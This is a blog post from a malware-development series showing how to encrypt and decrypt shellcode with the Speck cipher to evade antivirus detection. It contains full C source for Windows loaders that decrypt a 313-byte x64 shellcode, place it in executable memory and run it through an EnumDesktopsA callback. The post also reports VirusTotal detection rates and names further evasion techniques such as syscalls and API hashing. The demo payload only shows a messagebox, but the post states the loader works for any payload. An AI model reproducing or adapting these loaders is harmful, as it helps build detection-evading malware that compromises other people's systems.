Malware and cryptography 42 - encrypt/decrypt payload via Speck cipher. Simple C example.
﷽
Hello, cybersecurity enthusiasts and white hackers!
In this post, I continue my exploration of symmetric-key block ciphers for encrypting and decrypting payloads to evade antivirus (AV) detection. Previously, I delved into various algorithms like LOKI, Khufu, and Camellia. Today, I focus on the Speck cipher, a lightweight block cipher developed by the NSA, known for its simplicity and efficiency, making it suitable for resource-constrained environments.
Speck Cipher
Speck is a family of lightweight block ciphers designed for optimal performance in software implementations. It operates on a Feistel-like structure with simple operations: addition, rotation, and XOR (ARX). Speck supports various block and key sizes; in this example, we’ll use Speck128/128, which has a block size of 128 bits and a key size of 128 bits.
practical example 1
First of all, let’s implement Speck128/128 in C to encrypt and decrypt a block.
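We need some constants and the key setup. Note that the Speck specification defines 32 rounds for Speck128/128; the 27 used here is the round count of Speck64/128, so this example is a reduced-round variant: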
#define ROUNDS 27
#define BLOCK_SIZE 16
uint64_t key[2] = {0x1918111009080100, 0x1110980801000908};
uint64_t round_keys[ROUNDS];
Also, we need bit rotation helpers:
uint64_t rol(uint64_t x, int r) {
return (x << r) | (x >> (64 - r));
}
uint64_t ror(uint64_t x, int r) {
return (x >> r) | (x << (64 - r));
}
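These functions perform left and right circular shifts (rotations) on 64-bit words. They assume 0 < r < 64, which holds for the rotation amounts 3 and 8 used by Speck.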
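The helpers are only well defined for shift counts strictly between 0 and 64, because shifting a 64-bit value by 64 is undefined in C. A minimal sketch of a variant that masks the count, so that any r is safe, could look like this (the names rotl64 and rotr64 are assumptions made for illustration, not part of the original code):

```c
#include <stdint.h>

// Hypothetical helpers (names are assumptions, not from the post).
// Masking the count keeps both shifts in the range 0..63.
uint64_t rotl64(uint64_t x, unsigned r) {
  r &= 63;
  return (x << r) | (x >> ((64 - r) & 63));
}

uint64_t rotr64(uint64_t x, unsigned r) {
  r &= 63;
  return (x >> r) | (x << ((64 - r) & 63));
}
```

Rotating left and then right by the same amount restores the input, and a rotation by 0 returns the value unchanged.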
Then we need key schedule logic:
void speck_key_schedule() {
round_keys[0] = key[0];
uint64_t b = key[1];
for (int i = 0; i < ROUNDS - 1; i++) {
b = (ror(b, 8) + round_keys[i]) ^ i;
round_keys[i + 1] = rol(round_keys[i], 3) ^ b;
}
}
As you can see, the logic is simple: the first round key is taken directly from the provided 128-bit key, and each subsequent round key is derived using rotation, addition, and XOR.
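To make the recurrence concrete, here is a minimal sketch of the same schedule written as a function that takes the key words and the round count as arguments instead of using globals. The function name speck_expand_key, its signature, and the ks_ prefixed rotation helpers are assumptions introduced for illustration:

```c
#include <stdint.h>

uint64_t ks_rol(uint64_t x, int r) { return (x << r) | (x >> (64 - r)); }
uint64_t ks_ror(uint64_t x, int r) { return (x >> r) | (x << (64 - r)); }

// Hypothetical variant of speck_key_schedule() without global state.
// k0 becomes the first round key; l is the running second key word.
// rk must have room for `rounds` entries.
void speck_expand_key(uint64_t k0, uint64_t l0, uint64_t *rk, int rounds) {
  uint64_t l = l0;
  rk[0] = k0;
  for (int i = 0; i < rounds - 1; i++) {
    l = (ks_ror(l, 8) + rk[i]) ^ (uint64_t)i;  // mix the round counter into l
    rk[i + 1] = ks_rol(rk[i], 3) ^ l;          // derive the next round key
  }
}
```

As a hand-checkable example, with k0 = 0x0706050403020100 and l0 = 0x0f0e0d0c0b0a0908 the first iteration gives l = 0x0f1513110f0d0b09 and rk[1] = 0x37253b31171d0309.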
After this, we work on the encryption logic. We need to rotate and mix the left and right halves (x, y) with the round key in every round (27 times in my case):
void speck_encrypt(uint64_t* x, uint64_t* y) {
for (int i = 0; i < ROUNDS; i++) {
*x = (ror(*x, 8) + *y) ^ round_keys[i];
*y = rol(*y, 3) ^ *x;
}
}
The decryption function just reverses the encryption steps:
void speck_decrypt(uint64_t* x, uint64_t* y) {
for (int i = ROUNDS - 1; i >= 0; i--) {
*y = ror(*y ^ *x, 3);
*x = rol((*x ^ round_keys[i]) - *y, 8);
}
}
As you can see, just process rounds in reverse order with inverse operations.
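The inverse relationship can be checked on a single round. The sketch below isolates one forward round and its inverse; the function names and the ror64/rol64 helpers are assumptions introduced for illustration, and the bodies mirror the loop bodies of speck_encrypt and speck_decrypt:

```c
#include <stdint.h>

uint64_t rol64(uint64_t x, int r) { return (x << r) | (x >> (64 - r)); }
uint64_t ror64(uint64_t x, int r) { return (x >> r) | (x << (64 - r)); }

// One forward round, as in the loop body of speck_encrypt().
void speck_round(uint64_t *x, uint64_t *y, uint64_t k) {
  *x = (ror64(*x, 8) + *y) ^ k;
  *y = rol64(*y, 3) ^ *x;
}

// The matching inverse round: undo the y update first, then the x update.
void speck_round_inv(uint64_t *x, uint64_t *y, uint64_t k) {
  *y = ror64(*y ^ *x, 3);
  *x = rol64((*x ^ k) - *y, 8);
}

// Returns 1 if a round followed by its inverse restores (x, y).
int round_is_invertible(uint64_t x, uint64_t y, uint64_t k) {
  uint64_t a = x, b = y;
  speck_round(&a, &b, k);
  speck_round_inv(&a, &b, k);
  return a == x && b == y;
}
```

The order matters: y has to be recovered first, because the inverse of the x update needs the original y for the subtraction.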
The full source code looks like this (hack.c):
/*
* hack.c
* encrypt/decrypt via Speck
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2025/05/29/malware-cryptography-42.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#define ROUNDS 27
#define BLOCK_SIZE 16
uint64_t key[2] = {0x1918111009080100, 0x1110980801000908};
uint64_t round_keys[ROUNDS];
uint64_t rol(uint64_t x, int r) {
return (x << r) | (x >> (64 - r));
}
uint64_t ror(uint64_t x, int r) {
return (x >> r) | (x << (64 - r));
}
void speck_key_schedule() {
round_keys[0] = key[0];
uint64_t b = key[1];
for (int i = 0; i < ROUNDS - 1; i++) {
b = (ror(b, 8) + round_keys[i]) ^ i;
round_keys[i + 1] = rol(round_keys[i], 3) ^ b;
}
}
void speck_encrypt(uint64_t* x, uint64_t* y) {
for (int i = 0; i < ROUNDS; i++) {
*x = (ror(*x, 8) + *y) ^ round_keys[i];
*y = rol(*y, 3) ^ *x;
}
}
void speck_decrypt(uint64_t* x, uint64_t* y) {
for (int i = ROUNDS - 1; i >= 0; i--) {
*y = ror(*y ^ *x, 3);
*x = rol((*x ^ round_keys[i]) - *y, 8);
}
}
int main() {
unsigned char payload[] =
"\x6d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x2d\x00";
printf("original: ");
for (int i = 0; i < BLOCK_SIZE; i++) printf("%02x ", payload[i]);
printf("\n");
speck_key_schedule();
uint64_t* pt = (uint64_t*)payload;
speck_encrypt(&pt[0], &pt[1]);
printf("encrypted: ");
for (int i = 0; i < BLOCK_SIZE; i++) printf("%02x ", payload[i]);
printf("\n");
speck_decrypt(&pt[0], &pt[1]);
printf("decrypted: ");
for (int i = 0; i < BLOCK_SIZE; i++) printf("%02x ", payload[i]);
printf("\n");
return 0;
}
Everything is printed for demo and debugging purposes.
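One portability note on the pointer cast in main: reading a byte array through a uint64_t* works with common compilers on x86-64, but strictly speaking it runs into C's aliasing and alignment rules. A hedged sketch of an alternative that copies each half of the block into local words with memcpy is shown below; load_block and store_block are hypothetical helper names, not part of hack.c:

```c
#include <stdint.h>
#include <string.h>

// Hypothetical helpers: move one 16-byte block between a byte buffer
// and the two 64-bit words (x, y) that the cipher works on.
// The byte order is the host's, exactly as with the pointer cast.
void load_block(const unsigned char *buf, uint64_t *x, uint64_t *y) {
  memcpy(x, buf, 8);
  memcpy(y, buf + 8, 8);
}

void store_block(unsigned char *buf, uint64_t x, uint64_t y) {
  memcpy(buf, &x, 8);
  memcpy(buf + 8, &y, 8);
}
```

A block would then be processed as load_block(payload, &x, &y), followed by speck_encrypt(&x, &y) and store_block(payload, x, y).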
demo 1
Let’s see everything in action. Compile it (on my Linux machine):
gcc -o hack hack.c
Then run it:
./hack
As you can see, everything worked perfectly! =^..^=
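A round trip only shows that decryption undoes encryption; it does not show that the cipher matches the specification. One way to check that is a known-answer test. The sketch below is an addition, not part of hack.c: it repeats the same key schedule and round logic with local state, runs 32 rounds (the count the Speck paper specifies for Speck128/128), and compares the result with the Speck128/128 test vector published by the Speck designers. The function names are assumptions; x is the first word of each pair as printed in the test vector.

```c
#include <stdint.h>

#define KAT_ROUNDS 32  // round count specified for Speck128/128

uint64_t kat_rol(uint64_t x, int r) { return (x << r) | (x >> (64 - r)); }
uint64_t kat_ror(uint64_t x, int r) { return (x >> r) | (x << (64 - r)); }

// Encrypt one block (x, y) in place under the key words (l0, k0).
void speck128_128_encrypt(uint64_t *x, uint64_t *y, uint64_t l0, uint64_t k0) {
  uint64_t rk[KAT_ROUNDS];
  uint64_t l = l0;
  rk[0] = k0;
  for (int i = 0; i < KAT_ROUNDS - 1; i++) {
    l = (kat_ror(l, 8) + rk[i]) ^ (uint64_t)i;
    rk[i + 1] = kat_rol(rk[i], 3) ^ l;
  }
  for (int i = 0; i < KAT_ROUNDS; i++) {
    *x = (kat_ror(*x, 8) + *y) ^ rk[i];
    *y = kat_rol(*y, 3) ^ *x;
  }
}

// Returns 1 if the output matches the published test vector, 0 otherwise.
int speck128_128_kat(void) {
  uint64_t x = 0x6c61766975716520ULL, y = 0x7469206564616d20ULL;
  speck128_128_encrypt(&x, &y, 0x0f0e0d0c0b0a0908ULL, 0x0706050403020100ULL);
  return x == 0xa65d985179783265ULL && y == 0x7860fedf5c570d18ULL;
}
```

The same comparison would not hold with a different round count, which makes it a quick way to notice a reduced-round build.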
practical example 2
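Let’s implement Speck128/128 in C to encrypt and decrypt a payload. The payload is 313 bytes long. This is not a multiple of 16, so to encrypt it in 128-bit (16-byte) blocks with the Speck algorithm, the buffer has to be rounded up to 320 bytes (20 blocks); otherwise the last block would read and write 7 bytes past the end of the array.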
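The block arithmetic can be sketched as follows. blocks_needed and padded_len are hypothetical helper names introduced here for illustration; they only compute how many 16-byte blocks a buffer of a given length occupies:

```c
#include <stddef.h>

#define SPECK_BLOCK 16  // bytes per 128-bit block

// Number of 16-byte blocks needed to hold len bytes (rounds up).
size_t blocks_needed(size_t len) {
  return (len + SPECK_BLOCK - 1) / SPECK_BLOCK;
}

// Buffer size after rounding len up to a whole number of blocks.
size_t padded_len(size_t len) {
  return blocks_needed(len) * SPECK_BLOCK;
}
```

For instance, padded_len(313) is 320, while padded_len(320) stays 320.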
Everything is the same as in the previous example; the only differences are:
encrypt the payload block by block via Speck:
for (int i = 0; i < payload_len; i += BLOCK_SIZE) {
speck_encrypt((uint64_t*)&payload[i], (uint64_t*)&payload[i+8]);
}
output of encrypted payload:
printf("encrypted: \n");
for (int i = 0; i < payload_len; i++) {
printf("%02x ", payload[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
printf("\n\n");
decryption for verification:
for (int i = 0; i < payload_len; i += BLOCK_SIZE) {
speck_decrypt((uint64_t*)&payload[i], (uint64_t*)&payload[i+8]);
}
run shellcode via EnumDesktopsA:
printf("decrypted: \n");
for (int i = 0; i < payload_len; i++) {
printf("%02x ", payload[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
LPVOID mem = VirtualAlloc(NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(mem, payload, payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
The full source code for this example looks like this (hack2.c):
/*
* hack2.c
* encrypt/decrypt payload via Speck
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2025/05/29/malware-cryptography-42.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <windows.h>
#define ROUNDS 27
#define BLOCK_SIZE 16
uint64_t key[2] = {0x1918111009080100, 0x1110980801000908};
uint64_t round_keys[ROUNDS];
uint64_t rol(uint64_t x, int r) {
return (x << r) | (x >> (64 - r));
}
uint64_t ror(uint64_t x, int r) {
return (x >> r) | (x << (64 - r));
}
void speck_key_schedule() {
round_keys[0] = key[0];
uint64_t b = key[1];
for (int i = 0; i < ROUNDS - 1; i++) {
b = (ror(b, 8) + round_keys[i]) ^ i;
round_keys[i + 1] = rol(round_keys[i], 3) ^ b;
}
}
void speck_encrypt(uint64_t* x, uint64_t* y) {
for (int i = 0; i < ROUNDS; i++) {
*x = (ror(*x, 8) + *y) ^ round_keys[i];
*y = rol(*y, 3) ^ *x;
}
}
void speck_decrypt(uint64_t* x, uint64_t* y) {
for (int i = ROUNDS - 1; i >= 0; i--) {
*y = ror(*y ^ *x, 3);
*x = rol((*x ^ round_keys[i]) - *y, 8);
}
}
int main() {
unsigned char payload[320] = { // 313 payload bytes, zero-padded to 20 blocks of 16
0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
};
int payload_len = sizeof(payload);
speck_key_schedule();
for (int i = 0; i < payload_len; i += BLOCK_SIZE) {
speck_encrypt((uint64_t*)&payload[i], (uint64_t*)&payload[i+8]);
}
printf("encrypted: \n");
for (int i = 0; i < payload_len; i++) {
printf("%02x ", payload[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
printf("\n\n");
for (int i = 0; i < payload_len; i += BLOCK_SIZE) {
speck_decrypt((uint64_t*)&payload[i], (uint64_t*)&payload[i+8]);
}
printf("decrypted: \n");
for (int i = 0; i < payload_len; i++) {
printf("%02x ", payload[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
LPVOID mem = VirtualAlloc(NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(mem, payload, payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
return 0;
}
As usual, the meow-meow messagebox payload is used here:
unsigned char payload[] = {
0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
};
demo 2
Let’s see everything in action. Cross-compile it (on my Linux machine):
x86_64-w64-mingw32-g++ hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
Then run it:
.\hack2.exe
As you can see, everything worked perfectly! =^..^=
Upload to VirusTotal:
So, 25 of 71 AV engines detect our file as malicious, because our hack2.exe malware uses a well-known shellcode launching technique.
For better results we can use syscalls, HellsGate techniques, function call obfuscation, hashing WINAPI functions, etc.
practical example 3
What if the payload size is not a multiple of 16? In this case we need padding. Here’s an implementation of the Speck cipher that includes the key schedule, encryption, decryption, and padding logic:
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#define ROUNDS 32
#define BLOCK_SIZE 16 // 128 bits
uint64_t key[2] = {0x1b1a191813121110, 0x0b0a090803020100};
uint64_t round_keys[ROUNDS];
uint64_t rol(uint64_t x, int r) {
return (x << r) | (x >> (64 - r));
}
uint64_t ror(uint64_t x, int r) {
return (x >> r) | (x << (64 - r));
}
void speck_key_schedule() {
uint64_t b = key[1];
round_keys[0] = key[0];
for (int i = 0; i < ROUNDS - 1; i++) {
b = (ror(b, 8) + round_keys[i]) ^ i;
round_keys[i + 1] = rol(round_keys[i], 3) ^ b;
}
}
void speck_encrypt(uint64_t* x, uint64_t* y) {
for (int i = 0; i < ROUNDS; i++) {
*x = (ror(*x, 8) + *y) ^ round_keys[i];
*y = rol(*y, 3) ^ *x;
}
}
void speck_decrypt(uint64_t* x, uint64_t* y) {
for (int i = ROUNDS - 1; i >= 0; i--) {
*y = ror(*y ^ *x, 3);
*x = rol((*x ^ round_keys[i]) - *y, 8);
}
}
void pad_payload(unsigned char** payload, int* length) {
int pad_len = BLOCK_SIZE - (*length % BLOCK_SIZE);
if (pad_len == 0) pad_len = BLOCK_SIZE;
*payload = realloc(*payload, *length + pad_len);
memset(*payload + *length, 0x90, pad_len); // NOP padding
*length += pad_len;
}
void encrypt_payload(unsigned char* payload, int length) {
for (int i = 0; i < length; i += BLOCK_SIZE) {
speck_encrypt((uint64_t*)(payload + i), (uint64_t*)(payload + i + 8));
}
}
void decrypt_payload(unsigned char* payload, int length) {
for (int i = 0; i < length; i += BLOCK_SIZE) {
speck_decrypt((uint64_t*)(payload + i), (uint64_t*)(payload + i + 8));
}
}
void print_payload(const char* label, unsigned char* payload, int length) {
printf("%s: ", label);
for (int i = 0; i < length; i++) {
printf("\\x%02x", payload[i]);
}
printf("\n");
}
int main() {
unsigned char shellcode[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
int length = sizeof(shellcode) - 1;
unsigned char* payload = malloc(length);
memcpy(payload, shellcode, length);
speck_key_schedule();
printf("original payload\n");
for (int i = 0; i < length; i++) {
printf("\\x%02x", payload[i]);
}
printf("\n");
pad_payload(&payload, &length);
encrypt_payload(payload, length);
printf("encrypted payload\n");
for (int i = 0; i < length; i++) {
printf("\\x%02x", payload[i]);
}
printf("\n");
decrypt_payload(payload, length);
printf("decrypted payload\n");
for (int i = 0; i < length; i++) {
printf("\\x%02x", payload[i]);
}
printf("\n");
// execute the decrypted payload
LPVOID mem = VirtualAlloc(NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, payload, length);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
free(payload);
return 0;
}
demo 3
Let’s check the last example. For simplicity, just check it on Linux first (comment out the lines with Windows functions), then compile:
gcc -o hack3 hack3.c
run:
./hack3
As you can see, padding worked! =^..^=
You can use it for any payload!
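Note that 0x90 padding cannot be told apart from payload bytes afterwards, which is fine for a NOP tail but not for arbitrary data. A common alternative, shown here as a minimal sketch and not as what the code above does, is PKCS#7-style padding, where every padding byte stores the padding length so it can be stripped after decryption. The function names and the caller-provided buffer interface are assumptions:

```c
#include <stddef.h>
#include <string.h>

#define PAD_BLOCK 16

// Appends 1..16 padding bytes, each equal to the padding length.
// buf must have room for at least len + PAD_BLOCK bytes.
// Returns the new length.
size_t pkcs7_pad(unsigned char *buf, size_t len) {
  size_t pad = PAD_BLOCK - (len % PAD_BLOCK);
  memset(buf + len, (int)pad, pad);
  return len + pad;
}

// Validates the padding and returns the unpadded length,
// or (size_t)-1 if the padding is malformed.
size_t pkcs7_unpad(const unsigned char *buf, size_t len) {
  if (len == 0 || len % PAD_BLOCK != 0) return (size_t)-1;
  size_t pad = buf[len - 1];
  if (pad == 0 || pad > PAD_BLOCK) return (size_t)-1;
  for (size_t i = len - pad; i < len; i++) {
    if (buf[i] != pad) return (size_t)-1;
  }
  return len - pad;
}
```

A payload whose length is already a multiple of 16 gets one full extra block of padding, which is what keeps the scheme unambiguous.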
The Speck algorithm I’ve implemented is a correct (but simplified, educational) version of Speck. My code correctly implements the core Speck operations: modular addition, bitwise XOR, and circular rotations (using rol and ror). The speck_key_schedule function implements the standard Speck key schedule for a two-word key, generating round keys from the initial key, and the speck_encrypt and speck_decrypt functions follow the standard Speck round structure.
But there are some important caveats in my code:
My implementation represents Speck128/128 (128-bit block, 128-bit key), as indicated by the 64-bit words and two 64-bit key words. The Speck specification defines 32 rounds for this variant, which is what the third example uses; the first two examples run 27 rounds (the round count of Speck64/128), so they are reduced-round variants and will not reproduce the published test vectors. Speck has other variations (e.g., Speck64/128, Speck32/64) with different block and key sizes.
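For reference, the round counts that the Speck paper specifies for each block/key combination can be kept in a small lookup table. The sketch below is an illustration only; the struct and function names are hypothetical:

```c
#include <stddef.h>

// Parameters of the ten Speck variants as listed in the Speck paper.
struct speck_variant {
  int block_bits;
  int key_bits;
  int rounds;
};

static const struct speck_variant SPECK_VARIANTS[] = {
  { 32,  64, 22},
  { 48,  72, 22}, { 48,  96, 23},
  { 64,  96, 26}, { 64, 128, 27},
  { 96,  96, 28}, { 96, 144, 29},
  {128, 128, 32}, {128, 192, 33}, {128, 256, 34},
};

// Returns the specified round count, or -1 for an unknown combination.
int speck_rounds(int block_bits, int key_bits) {
  size_t n = sizeof(SPECK_VARIANTS) / sizeof(SPECK_VARIANTS[0]);
  for (size_t i = 0; i < n; i++) {
    if (SPECK_VARIANTS[i].block_bits == block_bits &&
        SPECK_VARIANTS[i].key_bits == key_bits) {
      return SPECK_VARIANTS[i].rounds;
    }
  }
  return -1;
}
```

Here speck_rounds(128, 128) returns 32 and speck_rounds(64, 128) returns 27, which is where the two ROUNDS values used in this post come from.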
I hope this post spreads awareness among blue teamers of this interesting encryption technique, and adds a weapon to the arsenal of red teamers and C/C++ programmers.
I often write about the results of my research here and at various conferences like BlackHat and BSides, and I receive many emails and messages with various questions. I try to answer questions and consider problems that are interesting to my readers.
Run shellcode via EnumDesktopsA
Malware and cryptography 1
source code in github
This is a practical case for educational purposes only.
Thanks for your time, happy hacking, and goodbye!
PS. All drawings and screenshots are mine